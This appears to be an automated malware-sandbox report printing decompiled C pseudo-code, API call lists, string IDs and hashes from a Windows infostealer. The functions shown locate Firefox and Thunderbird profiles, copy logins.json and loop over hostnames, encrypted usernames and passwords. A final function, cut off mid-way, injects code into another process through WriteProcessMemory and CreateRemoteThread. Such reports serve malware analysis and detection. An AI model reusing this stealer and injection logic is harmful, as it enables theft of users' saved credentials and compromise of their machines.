				E004036F7( &_v24, L"Profile");
				_t281 = 0;
				E00401052( &_v1224, 0, 0x208);
				_t396 = _t395 + 0xc;
				_v92 = 0;
				_t389 = 0;
				E00401052( &_v704, 0, 0x104);
				_t385 =  &_v704;
				if(E0040B87D(L"firefox.exe",  &_v704, _t397) != 0) {
					_t293 =  &_v44;
					E004036F7(_t293,  &_v704);
					lstrcatW( &_v704, L"\\firefox.exe");
					GetBinaryTypeW( &_v704,  &_v92);
					_t399 = _v92 - 6;
					_t165 =  &_v44;
					if(_v92 != 6) {
						_push(0);
					} else {
						_push(1);
					}
					_push(_t293);
					E0040373F(_t396, _t165);
					_t167 = E0040B165(_t392, _t385, _t399);
					_t400 = _t167;
					if(_t167 != 0) {
						E0040357C( &_a4, _t385, _t400, L"\\Mozilla\\Firefox\\");
						E0040373F( &_v36,  &_a4);
						E0040357C( &_v36, _t385, _t400, L"profiles.ini");
						E00403549( &_v24, E004036F7( &_v40, L"Profile"));
						E00405FEB(_v40);
						E00403384( &_v24, _t385, _t400, _t281);
						while(GetPrivateProfileStringW(_v24, L"Path", _t281,  &_v1224, 0x104, _v36) != 0) {
							_t389 = _t389 + 1;
							_v40 = _t389;
							E00403549( &_v24, E004036F7( &_v96, L"Profile"));
							E00405FEB(_v96);
							_v96 = _t281;
							E00403384( &_v24, _t385, __eflags, _t389);
							E0040373F( &_v12,  &_a4);
							E0040357C( &_v12, _t385, __eflags,  &_v1224);
							E00403666( &_v12,  &_v28);
							_t189 =  *((intOrPtr*)(_t392 + 0x68))(_v28);
							__eflags = _t189;
							if(_t189 == 0) {
								_t190 =  *((intOrPtr*)(_t392 + 0x80))();
								_v156 = _t190;
								__eflags = _t190;
								if(_t190 == 0) {
									goto L7;
								} else {
									_t193 =  *((intOrPtr*)(_t392 + 0x7c))(_t190, 1, _t281);
									_t396 = _t396 + 0xc;
									__eflags = _t193;
									if(_t193 != 0) {
										goto L7;
									} else {
										E0040373F( &_v20,  &_v12);
										E0040357C( &_v20, _t385, __eflags, L"\\logins.json");
										_t386 = 0x1a;
										E00410C8A( &_v16, _t386, __eflags);
										E0040357C( &_v16, _t386, __eflags, "\\");
										_t385 = 8;
										E00403447( &_v16, __eflags, E004035B9( &_v56, _t385, __eflags));
										E00405FEB(_v56);
										_v56 = _t281;
										E0040357C( &_v16, _t385, __eflags, L".tmp");
										_t393 = _v16;
										_t390 = _v20;
										__eflags = CopyFileW(_v20, _t393, _t281);
										if(__eflags != 0) {
											E00403549( &_v20,  &_v16);
											_t390 = _v20;
										}
										E004113ED( &_v184, __eflags);
										_t325 =  &_v180;
										E00403549(_t325,  &_v20);
										_push(_t325);
										_t207 = E004116B1( &_v184, 0xc0000000);
										_t327 =  &_v184;
										__eflags = _t207;
										if(__eflags != 0) {
											_v52 = _t281;
											_v48 = _t281;
											E0041135C( &_v184, _t385,  &_v52, _v164, _t281);
											_t215 = E004034D1( &_v116, "encryptedUsername");
											_t217 = E0040305D( &_v52,  &_v160);
											_t385 = _t215;
											_t283 = E0040961C(_t217, _t215, __eflags);
											_v120 = _t283;
											E00405FEB(_v160);
											_t336 = _v116;
											E00405FEB(_v116);
											__eflags = _t283;
											if(_t283 == 0) {
												_t281 = 0;
												__eflags = 0;
											} else {
												_t391 = _v32;
												_t281 = 0;
												__eflags = 0;
												_t394 = _v120;
												do {
													_v112 = 0;
													_v108 = 0;
													_v104 = 0;
													_t230 = E004034D1( &_v128, "hostname");
													E00409655( &_v88, E0040305D( &_v52,  &_v124), __eflags, _t230, _t394);
													E00405FEB(_v124);
													E00405FEB(_v128);
													_t236 = E004034D1( &_v136, "encryptedUsername");
													E00409655( &_v84, E0040305D( &_v52,  &_v132), __eflags, _t236, _t394);
													E00405FEB(_v132);
													E00405FEB(_v136);
													_t242 = E004034D1( &_v144, "encryptedPassword");
													_t385 = E0040305D( &_v52,  &_v140);
													E00409655( &_v80, _t244, __eflags, _t242, _t394);
													E00405FEB(_v140);
													E00405FEB(_v144);
													E0040A8C3(_t391, __eflags, _v84,  &_v72);
													E0040A8C3(_t391, __eflags, _v80,  &_v76);
													E00403549( &_v112, E004031AF( &_v88, __eflags,  &_v60));
													E00405FEB(_v60);
													_v60 = 0;
													E00403549( &_v108, E004031AF(E004034D1( &_v148, _v72), __eflags,  &_v64));
													E00405FEB(_v64);
													_v64 = 0;
													E00405FEB(_v148);
													E00403549( &_v104, E004031AF(E004034D1( &_v152, _v76), __eflags,  &_v68));
													E00405FEB(_v68);
													_v68 = 0;
													E00405FEB(_v152);
													_t396 = _t396 - 0x10;
													_v100 = 0;
													E00401FF2(_t396,  &_v112);
													E00402028(_t391);
													E00405FEB(_v72);
													E00405FEB(_v76);
													E00405FEB(_v80);
													E00405FEB(_v84);
													E00405FEB(_v88);
													_t336 =  &_v112;
													E00401441( &_v112);
													_t394 = _t394 - 1;
													__eflags = _t394;
												} while (_t394 != 0);
												_t393 = _v16;
												_t390 = _v20;
											}
											_t221 = PathFileExistsW(_t393);
											__eflags = _t221;
											if(_t221 != 0) {
												E0040373F(_t396,  &_v16);
												E0041142A(_t336);
											}
											 *((intOrPtr*)(_v32 + 0x84))(_v156);
											 *((intOrPtr*)(_v32 + 0x6c))();
											E00403148( &_v52);
											_t327 =  &_v184;
										}
										E0041140C(_t327, __eflags);
										E00405FEB(_t393);
										_v16 = _t281;
										E00405FEB(_t390);
										_v20 = _t281;
										E00405FEB(_v28);
										E00405FEB(_v12);
										_t389 = _v40;
										_t392 = _v32;
									}
								}
							} else {
								L7:
								E00405FEB(_v28);
								E00405FEB(_v12);
							}
							_v12 = _t281;
						}
						E0040B10E(_t392);
						_t281 = 1;
						E00405FEB(_v36);
					}
					E00405FEB(_v44);
				}
				E00405FEB(_v24);
				E00405FEB(_a4);
				return _t281;
			}







































































                                  0x0040a36f
                                  0x0040a37b
                                  0x0040a385
                                  0x0040a388
                                  0x0040a392
                                  0x0040a39c
                                  0x0040a3a1
                                  0x0040a3a4
                                  0x0040a3ad
                                  0x0040a3b6
                                  0x0040a3bd
                                  0x0040a3d0
                                  0x0040a3dd
                                  0x0040a3e0
                                  0x0040a3f1
                                  0x0040a402
                                  0x0040a408
                                  0x0040a40c
                                  0x0040a40f
                                  0x0040a47d
                                  0x0040a411
                                  0x0040a411
                                  0x0040a411
                                  0x0040a413
                                  0x0040a417
                                  0x0040a41e
                                  0x0040a423
                                  0x0040a425
                                  0x0040a433
                                  0x0040a43f
                                  0x0040a44c
                                  0x0040a462
                                  0x0040a46a
                                  0x0040a473
                                  0x0040a86a
                                  0x0040a480
                                  0x0040a489
                                  0x0040a495
                                  0x0040a49d
                                  0x0040a4a6
                                  0x0040a4a9
                                  0x0040a4b5
                                  0x0040a4c4
                                  0x0040a4d0
                                  0x0040a4d8
                                  0x0040a4dc
                                  0x0040a4de
                                  0x0040a4f5
                                  0x0040a4fb
                                  0x0040a501
                                  0x0040a503
                                  0x00000000
                                  0x0040a505
                                  0x0040a509
                                  0x0040a50c
                                  0x0040a50f
                                  0x0040a511
                                  0x00000000
                                  0x0040a513
                                  0x0040a51a
                                  0x0040a527
                                  0x0040a52e
                                  0x0040a532
                                  0x0040a53f
                                  0x0040a546
                                  0x0040a553
                                  0x0040a55b
                                  0x0040a568
                                  0x0040a56b
                                  0x0040a570
                                  0x0040a573
                                  0x0040a57f
                                  0x0040a581
                                  0x0040a58a
                                  0x0040a58f
                                  0x0040a58f
                                  0x0040a598
                                  0x0040a5a1
                                  0x0040a5a7
                                  0x0040a5ac
                                  0x0040a5b8
                                  0x0040a5bd
                                  0x0040a5c3
                                  0x0040a5c5
                                  0x0040a5d5
                                  0x0040a5d9
                                  0x0040a5dc
                                  0x0040a5e9
                                  0x0040a5fa
                                  0x0040a5ff
                                  0x0040a60e
                                  0x0040a610
                                  0x0040a613
                                  0x0040a618
                                  0x0040a61b
                                  0x0040a620
                                  0x0040a622
                                  0x0040a7f5
                                  0x0040a7f5
                                  0x0040a628
                                  0x0040a628
                                  0x0040a62b
                                  0x0040a62b
                                  0x0040a62d
                                  0x0040a630
                                  0x0040a639
                                  0x0040a63c
                                  0x0040a63f
                                  0x0040a642
                                  0x0040a659
                                  0x0040a663
                                  0x0040a66b
                                  0x0040a67c
                                  0x0040a693
                                  0x0040a69d
                                  0x0040a6a8
                                  0x0040a6b9
                                  0x0040a6ce
                                  0x0040a6d3
                                  0x0040a6e0
                                  0x0040a6eb
                                  0x0040a6f9
                                  0x0040a707
                                  0x0040a71c
                                  0x0040a724
                                  0x0040a72c
                                  0x0040a749
                                  0x0040a751
                                  0x0040a75c
                                  0x0040a75f
                                  0x0040a781
                                  0x0040a789
                                  0x0040a794
                                  0x0040a797
                                  0x0040a79c
                                  0x0040a79f
                                  0x0040a7a8
                                  0x0040a7af
                                  0x0040a7b7
                                  0x0040a7bf
                                  0x0040a7c7
                                  0x0040a7cf
                                  0x0040a7d7
                                  0x0040a7dc
                                  0x0040a7df
                                  0x0040a7e4
                                  0x0040a7e4
                                  0x0040a7e4
                                  0x0040a7ed
                                  0x0040a7f0
                                  0x0040a7f0
                                  0x0040a7f8
                                  0x0040a7fe
                                  0x0040a800
                                  0x0040a809
                                  0x0040a80e
                                  0x0040a813
                                  0x0040a81d
                                  0x0040a827
                                  0x0040a82d
                                  0x0040a832
                                  0x0040a832
                                  0x0040a838
                                  0x0040a83f
                                  0x0040a846
                                  0x0040a849
                                  0x0040a851
                                  0x0040a854
                                  0x0040a85c
                                  0x0040a861
                                  0x0040a864
                                  0x0040a864
                                  0x0040a511
                                  0x0040a4e0
                                  0x0040a4e0
                                  0x0040a4e3
                                  0x0040a4eb
                                  0x0040a4eb
                                  0x0040a867
                                  0x0040a867
                                  0x0040a892
                                  0x0040a89c
                                  0x0040a89d
                                  0x0040a89d
                                  0x0040a8a5
                                  0x0040a8a5
                                  0x0040a8ad
                                  0x0040a8b5
                                  0x0040a8c0

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 0040B87D: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040B8B9
                                    • Part of subcall function 0040B87D: lstrcatW.KERNEL32 ref: 0040B8C7
                                    • Part of subcall function 0040B87D: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                    • Part of subcall function 0040B87D: RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                    • Part of subcall function 0040B87D: RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                  • lstrcatW.KERNEL32 ref: 0040A3F1
                                  • GetBinaryTypeW.KERNEL32 ref: 0040A402
                                  • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040A882
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00403384: wsprintfW.USER32 ref: 0040339F
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404FB1,?), ref: 00403693
                                    • Part of subcall function 00403666: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 004036BE
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0040A579
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyFileFreeOpenPrivateProfileQueryStringTypeValueVirtualwsprintf
                                  • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
                                  • API String ID: 288196626-815594582
                                  • Opcode ID: df8e03526ba9115c8cbe24748b02de1b57c24dd5a863437d0d80fd3bf3700f3c
                                  • Instruction ID: f77f0e27933f91ead54b6ecb8e2b1fb8a7b853b941c5058b019390cbb6b3834b
                                  • Opcode Fuzzy Hash: df8e03526ba9115c8cbe24748b02de1b57c24dd5a863437d0d80fd3bf3700f3c
                                  • Instruction Fuzzy Hash: 7EE1D571900219ABDB14EBA2DC92DEEBB79AF54308F10407FF506771D2DE386A45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409E2D, Relevance: 24.9, APIs: 4, Strings: 10, Instructions: 404COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E00409E2D(intOrPtr __ecx, void* __eflags, char _a4) {
				int _v12;
				int _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				int _v48;
				int _v52;
				long _v56;
				int _v60;
				int _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				void* _v104;
				int _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				int _v152;
				long _v156;
				char _v160;
				intOrPtr _v164;
				char _v180;
				char _v184;
				short _v704;
				short _v1224;
				long _t171;
				int _t182;
				int _t183;
				int _t186;
				int _t200;
				WCHAR* _t208;
				void* _t210;
				int _t214;
				void* _t223;
				void* _t229;
				void* _t235;
				int _t279;
				int _t281;
				char* _t321;
				void* _t382;
				intOrPtr _t385;
				intOrPtr _t387;
				WCHAR* _t392;
				int _t393;
				void* _t394;
				void* _t395;
				void* _t396;

				_t396 = __eflags;
				_t385 = __ecx;
				_v32 = __ecx;
				E004036F7( &_v24, L"Profile");
				_t279 = 0;
				E00401052( &_v1224, 0, 0x208);
				_v56 = 0;
				_v156 = 0;
				E00401052( &_v704, 0, 0x104);
				_t395 = _t394 + 0x14;
				_t381 =  &_v704;
				E0040B87D(L"thunderbird.exe",  &_v704, _t396);
				E004036F7( &_v44,  &_v704);
				GetBinaryTypeW( &_v704,  &_v156);
				E0040373F(_t395,  &_v44);
				_t289 = _t385;
				if(E0040ADE3(_t385,  &_v704,  &_v44) != 0) {
					L3:
					E0040357C( &_a4, _t381, __eflags, L"\\Thunderbird\\");
					E0040373F( &_v36,  &_a4);
					E0040357C( &_v36, _t381, __eflags, L"profiles.ini");
					E00403549( &_v24, E004036F7( &_v40, L"Profile"));
					E00405FEB(_v40);
					E00403384( &_v24, _t381, __eflags, _t279);
					_push(_v36);
					_push(0x104);
					while(1) {
						_t389 = _v24;
						_t171 = GetPrivateProfileStringW(_v24, L"Path", _t279,  &_v1224, ??, ??);
						__eflags = _t171;
						if(_t171 == 0) {
							break;
						}
						_v56 = _v56 + 1;
						E00403549( &_v24, E004036F7( &_v60, L"Profile"));
						E00405FEB(_v60);
						_v60 = _t279;
						E00403384( &_v24, _t381, __eflags, _v56 + 1);
						E0040373F( &_v12,  &_a4);
						E0040357C( &_v12, _t381, __eflags,  &_v1224);
						E00403666( &_v12,  &_v28);
						_t182 =  *((intOrPtr*)(_t385 + 0x68))(_v28);
						__eflags = _t182;
						if(_t182 == 0) {
							_t183 =  *((intOrPtr*)(_t385 + 0x80))();
							_v152 = _t183;
							__eflags = _t183;
							if(_t183 == 0) {
								goto L5;
							} else {
								_t186 =  *((intOrPtr*)(_t385 + 0x7c))(_t183, 1, _t279);
								_t395 = _t395 + 0xc;
								__eflags = _t186;
								if(_t186 != 0) {
									goto L5;
								} else {
									E0040373F( &_v20,  &_v12);
									E0040357C( &_v20, _t381, __eflags, L"\\logins.json");
									_t382 = 0x1a;
									E00410C8A( &_v16, _t382, __eflags);
									E0040357C( &_v16, _t382, __eflags, "\\");
									_t381 = 8;
									E00403447( &_v16, __eflags, E004035B9( &_v64, _t381, __eflags));
									E00405FEB(_v64);
									_v64 = _t279;
									E0040357C( &_v16, _t381, __eflags, L".tmp");
									_t392 = _v16;
									_t386 = _v20;
									__eflags = CopyFileW(_v20, _t392, _t279);
									if(__eflags != 0) {
										E00403549( &_v20,  &_v16);
										_t386 = _v20;
									}
									E004113ED( &_v184, __eflags);
									_t321 =  &_v180;
									E00403549(_t321,  &_v20);
									_push(_t321);
									_t200 = E004116B1( &_v184, 0xc0000000);
									_t323 =  &_v184;
									__eflags = _t200;
									if(__eflags != 0) {
										_v52 = _t279;
										_v48 = _t279;
										E0041135C( &_v184, _t381,  &_v52, _v164, _t279);
										_t208 = E004034D1( &_v104, "encryptedUsername");
										_t210 = E0040305D( &_v52,  &_v160);
										_t381 = _t208;
										_t281 = E0040961C(_t210, _t208, __eflags);
										_v108 = _t281;
										E00405FEB(_v160);
										_t332 = _v104;
										E00405FEB(_v104);
										__eflags = _t281;
										if(_t281 == 0) {
											_t279 = 0;
											__eflags = 0;
										} else {
											_t387 = _v32;
											_t279 = 0;
											__eflags = 0;
											_t393 = _v108;
											do {
												_v100 = 0;
												_v96 = 0;
												_v92 = 0;
												_t223 = E004034D1( &_v116, "hostname");
												E00409655( &_v40, E0040305D( &_v52,  &_v112), __eflags, _t223, _t393);
												E00405FEB(_v112);
												E00405FEB(_v116);
												_t229 = E004034D1( &_v124, "encryptedUsername");
												E00409655( &_v84, E0040305D( &_v52,  &_v120), __eflags, _t229, _t393);
												E00405FEB(_v120);
												E00405FEB(_v124);
												_t235 = E004034D1( &_v132, "encryptedPassword");
												_t381 = E0040305D( &_v52,  &_v128);
												E00409655( &_v80, _t237, __eflags, _t235, _t393);
												E00405FEB(_v128);
												E00405FEB(_v132);
												E0040A8C3(_t387, __eflags, _v84,  &_v136);
												E0040A8C3(_t387, __eflags, _v80,  &_v144);
												E00403549( &_v100, E004031AF( &_v40, __eflags,  &_v68));
												E00405FEB(_v68);
												_v68 = 0;
												E00403549( &_v96, E004031AF(E004034D1( &_v140, _v136), __eflags,  &_v72));
												E00405FEB(_v72);
												_v72 = 0;
												E00405FEB(_v140);
												E00403549( &_v92, E004031AF(E004034D1( &_v148, _v144), __eflags,  &_v76));
												E00405FEB(_v76);
												_v76 = 0;
												E00405FEB(_v148);
												_t395 = _t395 - 0x10;
												_v88 = 4;
												E00401FF2(_t395,  &_v100);
												E00402028(_t387);
												E00405FEB(_v80);
												E00405FEB(_v84);
												E00405FEB(_v40);
												_t332 =  &_v100;
												E00401441( &_v100);
												_t393 = _t393 - 1;
												__eflags = _t393;
											} while (_t393 != 0);
											_t392 = _v16;
											_t386 = _v20;
										}
										_t214 = PathFileExistsW(_t392);
										__eflags = _t214;
										if(_t214 != 0) {
											E0040373F(_t395,  &_v16);
											E0041142A(_t332);
										}
										 *((intOrPtr*)(_v32 + 0x84))(_v152);
										 *((intOrPtr*)(_v32 + 0x6c))();
										E00403148( &_v52);
										_t323 =  &_v184;
									}
									E0041140C(_t323, __eflags);
									E00405FEB(_t392);
									_v16 = _t279;
									E00405FEB(_t386);
									_v20 = _t279;
									E00405FEB(_v28);
									E00405FEB(_v12);
									_t385 = _v32;
								}
							}
						} else {
							L5:
							E00405FEB(_v28);
							E00405FEB(_v12);
						}
						_push(_v36);
						_v12 = _t279;
						_push(0x104);
					}
					E0040AD8C(_t385);
					_t279 = 1;
					__eflags = 1;
					E00405FEB(_v36);
				} else {
					E0040373F(_t395,  &_v44);
					if(E0040ADE3(_t385,  &_v704, _t289) != 0) {
						goto L3;
					} else {
						_t389 = _v24;
					}
				}
				E00405FEB(_v44);
				E00405FEB(_t389);
				E00405FEB(_a4);
				return _t279;
			}




































































                                  0x00409e2d
                                  0x00409e39
                                  0x00409e43
                                  0x00409e46
                                  0x00409e50
                                  0x00409e5a
                                  0x00409e64
                                  0x00409e6e
                                  0x00409e76
                                  0x00409e7b
                                  0x00409e7e
                                  0x00409e89
                                  0x00409e99
                                  0x00409eac
                                  0x00409eb9
                                  0x00409ebe
                                  0x00409ec7
                                  0x00409ee8
                                  0x00409ef0
                                  0x00409efc
                                  0x00409f09
                                  0x00409f1f
                                  0x00409f27
                                  0x00409f30
                                  0x00409f35
                                  0x00409f38
                                  0x0040a31e
                                  0x0040a31e
                                  0x0040a32f
                                  0x0040a335
                                  0x0040a337
                                  0x00000000
                                  0x00000000
                                  0x00409f4a
                                  0x00409f56
                                  0x00409f5e
                                  0x00409f67
                                  0x00409f6a
                                  0x00409f76
                                  0x00409f85
                                  0x00409f91
                                  0x00409f99
                                  0x00409f9d
                                  0x00409f9f
                                  0x00409fb6
                                  0x00409fbc
                                  0x00409fc2
                                  0x00409fc4
                                  0x00000000
                                  0x00409fc6
                                  0x00409fca
                                  0x00409fcd
                                  0x00409fd0
                                  0x00409fd2
                                  0x00000000
                                  0x00409fd4
                                  0x00409fdb
                                  0x00409fe8
                                  0x00409fef
                                  0x00409ff3
                                  0x0040a000
                                  0x0040a007
                                  0x0040a014
                                  0x0040a01c
                                  0x0040a029
                                  0x0040a02c
                                  0x0040a031
                                  0x0040a034
                                  0x0040a040
                                  0x0040a042
                                  0x0040a04b
                                  0x0040a050
                                  0x0040a050
                                  0x0040a059
                                  0x0040a062
                                  0x0040a068
                                  0x0040a06d
                                  0x0040a079
                                  0x0040a07e
                                  0x0040a084
                                  0x0040a086
                                  0x0040a096
                                  0x0040a09a
                                  0x0040a09d
                                  0x0040a0aa
                                  0x0040a0bb
                                  0x0040a0c0
                                  0x0040a0cf
                                  0x0040a0d1
                                  0x0040a0d4
                                  0x0040a0d9
                                  0x0040a0dc
                                  0x0040a0e1
                                  0x0040a0e3
                                  0x0040a2a4
                                  0x0040a2a4
                                  0x0040a0e9
                                  0x0040a0e9
                                  0x0040a0ec
                                  0x0040a0ec
                                  0x0040a0ee
                                  0x0040a0f1
                                  0x0040a0fa
                                  0x0040a0fd
                                  0x0040a100
                                  0x0040a103
                                  0x0040a11a
                                  0x0040a124
                                  0x0040a12c
                                  0x0040a13a
                                  0x0040a151
                                  0x0040a15b
                                  0x0040a163
                                  0x0040a171
                                  0x0040a183
                                  0x0040a188
                                  0x0040a192
                                  0x0040a19a
                                  0x0040a1ab
                                  0x0040a1bc
                                  0x0040a1d1
                                  0x0040a1d9
                                  0x0040a1e1
                                  0x0040a201
                                  0x0040a209
                                  0x0040a214
                                  0x0040a217
                                  0x0040a23c
                                  0x0040a244
                                  0x0040a24f
                                  0x0040a252
                                  0x0040a257
                                  0x0040a25a
                                  0x0040a267
                                  0x0040a26e
                                  0x0040a276
                                  0x0040a27e
                                  0x0040a286
                                  0x0040a28b
                                  0x0040a28e
                                  0x0040a293
                                  0x0040a293
                                  0x0040a293
                                  0x0040a29c
                                  0x0040a29f
                                  0x0040a29f
                                  0x0040a2a7
                                  0x0040a2ad
                                  0x0040a2af
                                  0x0040a2b8
                                  0x0040a2bd
                                  0x0040a2c2
                                  0x0040a2cc
                                  0x0040a2d6
                                  0x0040a2dc
                                  0x0040a2e1
                                  0x0040a2e1
                                  0x0040a2e7
                                  0x0040a2ee
                                  0x0040a2f5
                                  0x0040a2f8
                                  0x0040a300
                                  0x0040a303
                                  0x0040a30b
                                  0x0040a310
                                  0x0040a310
                                  0x00409fd2
                                  0x00409fa1
                                  0x00409fa1
                                  0x00409fa4
                                  0x00409fac
                                  0x00409fac
                                  0x0040a313
                                  0x0040a316
                                  0x0040a319
                                  0x0040a319
                                  0x0040a33f
                                  0x0040a349
                                  0x0040a349
                                  0x0040a34a
                                  0x00409ec9
                                  0x00409ed0
                                  0x00409ede
                                  0x00000000
                                  0x00409ee0
                                  0x00409ee0
                                  0x00409ee0
                                  0x00409ede
                                  0x0040a352
                                  0x0040a359
                                  0x0040a361
                                  0x0040a36c

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 0040B87D: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040B8B9
                                    • Part of subcall function 0040B87D: lstrcatW.KERNEL32 ref: 0040B8C7
                                    • Part of subcall function 0040B87D: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                    • Part of subcall function 0040B87D: RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                    • Part of subcall function 0040B87D: RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                  • GetBinaryTypeW.KERNEL32 ref: 00409EAC
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 0040ADE3: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040AE11
                                    • Part of subcall function 0040ADE3: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040AE1A
                                    • Part of subcall function 0040ADE3: PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF08
                                  • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 0040A32F
                                    • Part of subcall function 0040ADE3: PathFileExistsW.SHLWAPI(00409EC5), ref: 0040AF64
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,00409EC5,?,00000104,00000000), ref: 0040AFA3
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFAE
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFB9
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFC4
                                    • Part of subcall function 0040ADE3: LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040AFCF
                                    • Part of subcall function 0040ADE3: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B0BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad$CurrentDirectorylstrcpy$ExistsFilePathlstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
                                  • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
                                  • API String ID: 1065485167-1863067114
                                  • Opcode ID: f9e4d497a1a47c80fd96d8cbd3d63b1e460b11bbe56d18463cbdbc57bb97d7b2
                                  • Instruction ID: fb365c449ce7900d484e2c61c5ec7aa39d660c5b142231a0d8c8c55fb7191f8b
                                  • Opcode Fuzzy Hash: f9e4d497a1a47c80fd96d8cbd3d63b1e460b11bbe56d18463cbdbc57bb97d7b2
                                  • Instruction Fuzzy Hash: CDE1D671900219ABCB15EBA2DC92DEEBB79AF54308F10407EF506772D2DE386E45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407B2E, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 199injectionmemorywindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E00407B2E(long _a12) {
				long _v8;
				long _v12;
				long _v16;
				void* _v20;
				long _v24;
				signed int _t33;
				void* _t37;
				void* _t40;
				long _t49;
				_Unknown_base(*)()* _t64;
				SIZE_T* _t69;
				void* _t76;
				void* _t80;
				void* _t87;
				void* _t91;

				if( *0x426754 == 0) {
					 *0x426754 = E0040FB98() != 0;
				}
				_t33 = OpenProcess(0x1fffff, 0, _a12);
				_t91 = _t33;
				if(_t91 != 0) {
					_v12 = GetCurrentProcess();
					if(E004121DC( &_v12) == 0) {
						L15:
						_t64 = VirtualAllocEx(_t91, 0, 0x100000, 0x3000, 0x40);
						if(_t64 == 0) {
							L23:
							_push(0xfffffffe);
							L24:
							_pop(_t37);
							return _t37;
						}
						_v24 = _v24 & 0x00000000;
						VirtualProtectEx(_t91, _t64, 0x100000, 0x40,  &_v24);
						_t40 = VirtualAllocEx(_t91, 0x33370000, 0x100, 0x3000, 0x40);
						_v20 = _t40;
						if(_t40 == 0) {
							goto L23;
						}
						_v8 = _v8 & 0x00000000;
						_t87 = "XXXXXX";
						if(WriteProcessMemory(_t91, _v20, _t87, E00401133(_t87),  &_v8) == 0 || _v8 != E00401133(_t87)) {
							L22:
							_push(0xfffffffd);
							goto L24;
						} else {
							_v12 = 0;
							if(WriteProcessMemory(_t91, _t64, 0x41e6c0, 0x1d44,  &_v12) == 0 || _v12 != 0x1d44) {
								goto L22;
							} else {
								return CreateRemoteThread(_t91, 0, 0, _t64, 0, 0, 0);
							}
						}
					}
					_t69 =  &_v12;
					_v12 = _t91;
					if(E004121DC(_t69) != 0) {
						goto L15;
					}
					_push(_t69);
					_push(_t69);
					_t49 = E0040FBB4(_t91, 0x100000, 0, 0);
					_v24 = _t49;
